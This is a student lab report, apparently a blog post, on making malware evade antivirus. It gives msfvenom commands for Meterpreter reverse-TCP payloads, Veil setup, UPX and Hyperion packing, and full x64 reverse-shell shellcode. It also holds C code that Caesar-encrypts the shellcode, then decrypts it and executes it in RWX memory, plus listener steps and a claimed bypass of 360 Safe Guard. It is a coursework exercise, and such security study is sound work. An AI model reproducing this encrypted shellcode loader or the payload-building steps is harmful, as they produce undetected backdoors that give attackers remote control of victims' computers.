20222310 2024-2025-1 《网络与系统攻防技术》实验三实验报告

一、实验内容

1.正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧

(1)正确使用msf编码器,使用msfvenom生成如jar之类的其他文件

(2)学会使用veil,加壳工具

(3)能够使用C + shellcode编程

2.通过组合应用各种技术实现恶意代码免杀

成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图

3.用虚拟机实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

二、实验过程

1.使用msfvenom生成jar等文件

输入ifconfig查看虚拟机的ip地址。

输入msfvenom --list formats,查看msfvenom支持的所有输出格式

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.218.73 LPORT=8888 -f exe > 20222310-1.exe,生成payload

-p windows/meterpreter/reverse_tcp:指定了要生成的 payload 类型,是一个 Meterpreter 反向 TCP 连接

LHOST=172.16.218.73设置了连接回的本地 IP 地址,即kali的 IP 地址

LPORT=8888设置了连接回的本地端口号

-f exe: 这指定了输出格式为 Windows 可执行文件

输入msfvenom --list encoders,查看 msfvenom 支持的所有编码方式

输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=172.16.218.73 LPORT=8888 -f exe > 20222310-2.exe,使用编码器对payload进行编码

-e x86/shikata_ga_nai: 指定了使用的编码器

-b ‘\x00’: 指定了需要避免的坏字符集

LHOST、LPORT同上

输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=172.16.218.73 LPORT=8888 -f exe > 20222310-3.exe,多次编码,-i 10表示编码10次

输入msfvenom -p java/meterpreter/reverse_tcp LHOST=172.16.218.73 LPORT=8888 -f jar > 20222310-4.jar,选择一个适用于Java环境的payload来生成jar文件

输入msfvenom -p java/meterpreter/reverse_tcp LHOST=172.16.218.73 LPORT=8888 -e x86/shikata_ga_nai -i 10 -f jar > 20222310-5.jar

输入msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.218.73 LPORT=8888 -f elf > 20222310-6.elf,生成一个反向 TCP 连接的 Linux elf 可执行文件

输入msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.218.73 LPORT=8888 -e x86/shikata_ga_nai -i 10 -f elf > 20222310-7.elf

将刚刚生成的文件通过共享文件夹传到windows主机

打开VirusTotal的链接,放入文件,使用VirusTotal进行检测

2.安装并使用veil工具

安装veil时,要保证虚拟机联网,输入以下指令安装veil:

mkdir -p ~/.cache/wine

cd ~/.cache/wine

wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi

wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi

sudo apt-get install libncurses5*

sudo apt-get install libavutil55*

sudo apt-get install gcc-mingw-w64*

sudo apt-get install wine32

如果输入sudo apt-get install wine32后报错,先输入dpkg --add-architecture i386,再输入sudo apt-get update,然后再次输入sudo apt-get install wine32即可;

再输入以下指令:

apt-get install veil

sudo su

cd /usr/share/veil/config/

vim setup.sh

在第250多行的代码中,找到如图内容,把下载地址换成https://gitee.com/spears/VeilDependencies.git,按ESC键,输入:wq退出

输入veil,安装

过程中会弹出一些工具安装窗口,一路默认即可

如果报错,输入sudo /usr/share/veil/config/setup.sh --force --silent,继续安装

安装完成后,输入veil,如果出现如图内容,就说明veil安装成功

输入use evasion,进入Evil—Evasion

输入list,查看可使用的payload类型

输入use 7,使用c/meterpretermrev_tcp.py

依次输入(ip是kali的ip):

set LHOST 172.16.218.73

set LPORT 8888

generate

输入20222310_veil,即生成文件的名称

输入cd /var/lib/veil/output/compiled/,进入文件夹

输入ls查看生成的文件

将刚刚生成的文件通过共享文件夹传输到windows主机

打开VirusTotal的链接,放入文件,使用VirusTotal进行检测

3.使用C + shellcode编程

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.11.89 LPORT=8888 -f c,其中LHOST为反弹回连的IP,即Kali的IP

打开一个新终端,输入touch 20222310.c,新建20222310.c文件,输入vim 20222310.c,编辑这个文件

按i键进入编辑模式,将使用msfvenom生成的buf[]数组复制粘贴到打开的文件中,并输入C语言代码,代码如下

按ESC键,输入:wq退出编辑;

输入i686-w64-mingw32-g++ 20222310.c -o 20222310.exe

将刚刚生成的20222310.exe通过共享文件夹传输到windows主机

打开VirusTotal的链接,放入文件,使用VirusTotal进行检测

4.加壳

输入upx 20222310.exe -o upx20222310.exe

输入cp upx20222310.exe /usr/share/windows-resources/hyperion

输入cd /usr/share/windows-resources/hyperion进入文件夹

输入ls查看生成的可执行文件

输入wine hyperion.exe -v upx20222310.exe upx20222310zxc.exe

同样,将upx20222310.exe、upx20222310zxc.exe文件移入共享文件夹放到主机中

打开VirusTotal的链接,放入文件,使用VirusTotal进行检测

5.通过组合应用各种技术实现恶意代码免杀

kali虚拟机通过msfvenom生成Shellcode数组,输入msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.11.89 LPORT=8888 -f c

复制buf[]的内容

新建20222310_encrypt.cpp文件,输入代码,代码功能为将复制内容放入shellcode1[]数组中,通过代码将shellcode1进行凯撒加密,将密文输入到2310encrypt.txt文件中

在同一个文件夹下新建空文件2310encrypt.txt用以存放密文

代码如下:

#include <stdio.h>

#include<string.h>

//凯撒加密函数,适用于unsigned char数组

void caesarEncrypt(unsigned char *data, size_t length, int shift) {

for (size_t i = 0; i < length; i++) {

// 对每个字节进行位移

data[i]= (data[i] + shift) & 0xFF;

}

}

int main( ) {

unsigned char shellcode1[] ="\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
"\x52\x48\x31\xd2\x51\x56\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x4d\x31\xc9\x48\x0f\xb7\x4a\x4a\x48"
"\x8b\x72\x50\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x8b"
"\x42\x3c\x48\x01\xd0\x41\x51\x66\x81\x78\x18\x0b\x02\x0f"
"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0"
"\x74\x67\x48\x01\xd0\x44\x8b\x40\x20\x8b\x48\x18\x49\x01"
"\xd0\x50\xe3\x56\x4d\x31\xc9\x48\xff\xc9\x41\x8b\x34\x88"
"\x48\x01\xd6\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1"
"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8"
"\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x41\x58\x41\x58"
"\x48\x01\xd0\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83"
"\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00"
"\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49"
"\x89\xe5\x49\xbc\x02\x00\x22\xb8\xc0\xa8\x0b\x59\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5"
"\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b"
"\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31"
"\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41"
"\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58"
"\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00"
"\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58"
"\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00"
"\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68"
"\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba"
"\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9"
"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68"
"\x00\x40\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f"
"\x30\xff\xd5\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49"
"\xff\xce\xe9\x3c\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48"
"\x85\xf6\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"
"\xf0\xb5\xa2\x56\xff\xd5";


int shift =3; 

printf("original: ");

for (size_t i = 0; i < 510; i++) {

printf("\\x%02x",shellcode1[i]);

}

printf("\n");

caesarEncrypt(shellcode1,510,shift);

printf("Encrypted:");

for (size_t i =0;i< 510; i++){

printf("\\x%02x",shellcode1[i]);

    }

printf("\n");

    FILE *file = fopen("2310encrypt.txt", "w");

    if (file != NULL) {

        for (size_t i = 0; i < 510; i++) {

            fprintf(file, "\\x%02x", shellcode1[i]);

        }

        fprintf(file, "\n");

        fclose(file);

    } else {

        printf("Error opening file!\n");

    }

return 0;

}

编译运行该文件

新建20222310_decrypt.cpp文件,输入代码,代码功能为读取2310encrypt.txt文件中的内容到shellcode1[]数组中,并进行解密,再运行shellcode

代码如下:

#include <windows.h>

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

// 凯撒解密函数,适用于unsigned char数组

void caesarDecrypt(unsigned char *data, size_t length, int shift) {

    for (size_t i = 0; i < length; i++) {

        // 对每个字节进行位移

        data[i] = (unsigned char)((data[i] - shift + 256) % 256);

    }

}

 

int main() {

    int shift = 3; // 凯撒加密的位移值

    unsigned char shellcode1[511]; // 假设文件中的内容不超过510字节

    char line[1024]; // 用于读取文件的临时缓冲区

 

    // 打开文件

    FILE *file = fopen("2310encrypt.txt", "r");

    if (file == NULL) {

        perror("Error opening file");

        return 1;

    }

 

    // 读取文件内容到shellcode1数组中

    size_t length = 0;

    while (fgets(line, sizeof(line), file)) {

        // 将读取的十六进制字符串转换为字节并存储在shellcode1中

        for (size_t i = 0; line[i] != '\0' && line[i] != '\n'; i += 1) {

            if (sscanf(&line[i], "\\x%02hhx", &shellcode1[length]) == 1) {

                length++;

            }

        }

    }

    fclose(file);

 

    // 解密shellcode

    caesarDecrypt(shellcode1, length, shift);

 

    // 输出解密后的shellcode

    /*printf("Decrypted Shellcode:\n");

    for (size_t i = 0; i < 510; i++) {

        printf("\\x%02x", shellcode1[i]);

    }

    printf("\n");*/

 

    // 分配内存并设置为可执行

    LPVOID exec = VirtualAlloc(0, sizeof shellcode1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

 

    // 将解密后的shellcode复制到分配的内存中

    memcpy(exec, shellcode1, sizeof shellcode1);

    // 执行shellcode

    ((void(*)())exec)();

 

    return 0;

}

编译运行该文件

20222310_decrypt.exe,即后门文件

6.用电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

kali输入msfconsole指令进入msf控制台

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.11.89

set LPORT 8888

run

windows主机运行20222310_decrypt.exe,查看kali,已经获得windows的shell,说明回连成功

查杀20222310_encrypt.exe和20222310_decrypt.exe,没有发现异常

我使用的杀毒软件是360安全卫士13.0.0.2006

三、问题及解决方案

问题1:第一次安装完veil后,重启虚拟机,虚拟机始终黑屏,无法打开

问题1解决方案:查看硬盘空间发现安装完veil,20个g的空间已经不足,于是重装了虚拟机,这次划分了200个g,重新了安装veil后发现仅仅一个veil就用了23个g,说明预存重组的空间很重要。

问题2:输入apt-get update时,报错does the network require authentication

问题2解决方案:更新apt时是在教室进行的,教室的网需要验证,无法更新,切换实验地点到图书馆时成功更新

四、问题回答

1.杀软是如何检测出恶意代码的?

答:(1)特征码检测:杀软通过扫描文件和程序,寻找已知恶意软件的特征码(即特定的字节序列或模式)。这通常是通过维护一个恶意软件数据库来实现的
(2)启发式分析:这种方法通过分析程序的行为和结构,来判断其是否可能是恶意的。即使没有特征码,杀软也能根据一些可疑的行为(如尝试修改系统文件、访问敏感信息等)来识别潜在的威胁
(3)行为监控:一些杀软会实时监控系统中的活动,观察程序的行为。如果发现异常行为(例如大量的文件加密、网络活动异常等),就会发出警报
(4)沙箱技术:杀软可以将可疑程序在一个虚拟环境中运行,以观察其行为。通过这种方式,可以检测到一些恶意活动,而不会对真实系统造成损。

2.免杀是做什么?

答:通过各种技术手段,使恶意软件能够绕过杀毒软件的检测,从而不被识别和阻止

3.免杀的基本方法有哪些?

答:(1)代码混淆:通过改变代码结构和变量名称,使得原有逻辑难以被识别。混淆后的代码即使被分析,也很难还原
(2)加密:对恶意代码进行加密,只有在运行时才解密,增加了被静态检测识别的难度
(3)反调试技术:利用反调试手段检测是否有调试工具在运行,如果检测到调试器,就改变行为或退出程序
(4)多态性:每次生成新的恶意代码版本,改变其特征和行为,以避免被特征码检测到
(5)利用合法进程:通过合法进程或文件进行传播和执行,降低被杀软发现的几率

五、学习感悟、思考等

通过本次实验,我系统地掌握了利用MSF编码器、veil框架、加壳和c语言结合shellcode编程等多种高级技术生成恶意程序,并实现其免杀特性的过程,我还学会了利用VT网站检验免杀效果。此次实验不仅极大地丰富了我对免杀技术原理的理解,而且增强了我的实践能力和信息安全保密意识。

本次实验的困难主要集中于安装veil的过程中,安装的过程曲折而艰难,第一次刚安装完veil,我还在想为什么一直报错,结果下一次打开虚拟机直接一直黑屏了,问了同学才知道veil所需空间异常大,我这才想到查看硬盘容量,果然不够了,于是我卸载了原虚拟机重新安装。安装过程中又出现了很多问题,比如不显示ip地址,虚拟机不联网。不过好在安完虚拟机后再次安装veil的过程比较顺利。

posted on 2024-10-23 14:53  abe1fan  阅读(28)  评论(0编辑  收藏  举报

导航